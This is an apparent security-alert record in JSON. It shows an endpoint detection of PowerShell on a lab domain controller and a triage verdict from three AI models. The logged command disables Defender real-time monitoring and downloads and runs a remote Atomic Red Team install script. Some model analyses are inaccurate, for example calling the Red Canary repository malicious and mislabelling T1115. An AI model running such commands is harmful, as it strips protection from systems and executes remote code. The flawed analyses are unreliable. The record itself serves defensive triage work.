{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1115 -CheckPrereqs ; Invoke-AtomicTest T1115 -GetPrereqs ; Invoke-AtomicTest T1115 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 150003712,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld84DF.tmp.bat T1115 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4497408,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 644,
        "THIS_ATOM": "f6c3ef3bd7e0803778897af369c2a83c",
        "THREADS": 3,
        "TIMESTAMP": 1774364731328,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 644,
      "PROCESS_ID": 4708,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
      "event_time": 1774364731901,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3226,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "f6c3ef3bd7e0803778897af369c2a83c",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "abf4184fcffb7c87575b024b69c2a83e"
    }
  },
  "detect_id": "8cb5b1a3-22ef-4905-adca-1b4b69c2a83f",
  "gen_time": 1774364735129,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364731\u0026selected=abf4184fcffb7c87575b024b69c2a83e",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "96ec0659-ba2c-487d-b344-3557fc700570",
    "event_time": 1774364731901,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3226,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "f6c3ef3bd7e0803778897af369c2a83c",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "abf4184fcffb7c87575b024b69c2a83e"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364735000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was this testing part of a scheduled security exercise?",
    "Has the real-time monitoring been restored on df-labsdc01?",
    "Are there other Atomic tests currently running on this sensor?"
  ],
  "ioc_analysis": "The PowerShell command line contains clear indicators of adversary emulation: specifically, the installation of Atomic Red Team and the disabling of Windows Defender real-time monitoring. The hash for powershell.exe is a known-good Microsoft binary, but the actions performed are high-risk security control tampering.",
  "iocs_extracted": [
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "Invoke-AtomicTest T1115"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1115",
    "T1059.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Confirm authorization for Atomic Red Team testing on the domain controller.",
    "Verify that real-time monitoring has been re-enabled following the test completion.",
    "Monitor for any subsequent execution of compiled code (csc.exe/cvtres.exe) which may follow the initial ART installation."
  ],
  "risk_score": 80,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe detection identifies an explicit command to disable Microsoft Defender real-time monitoring via PowerShell (\u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027). This command was executed as part of an Atomic Red Team (ART) test (T1115 - Screen Capture) initiated via a batch script in C:\\Windows\\TEMP on a domain controller (df-labsdc01).\n\n**IOC Analysis:** The PowerShell command line contains clear indicators of adversary emulation: specifically, the installation of Atomic Red Team and the disabling of Windows Defender real-time monitoring. The hash for powershell.exe is a known-good Microsoft binary, but the actions performed are high-risk security control tampering.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework via PowerShell under SYSTEM privileges. The command explicitly disables Microsoft Defender\u0027s real-time protection and downloads code from a known malicious GitHub repository.\n\n**IOC Analysis:** The process path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is legitimate, but the command line contains clear indicators of compromise including disabling real-time monitoring (Set-MpPreference), downloading and executing remote code from a known malicious source (redcanaryco/invoke-atomicredteam), and invoking Atomic Red Team tests for T1115 (Execution). The use of SYSTEM privileges combined with these actions confirms malicious intent rather than benign system maintenance.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a legitimate PowerShell process from C:\\Windows\\System32, but the command line attempts to disable real-time monitoring and download scripts from GitHub, which is suspicious and could indicate evasion tactics.\n\n**IOC Analysis:** The FILE_PATH C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known-good Windows binary location, and the hash matches a Microsoft-signed PowerShell executable. However, the command line includes actions to change execution policy, disable real-time monitoring, and download scripts from external sources, which deviates from normal system behavior and raises suspicion.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}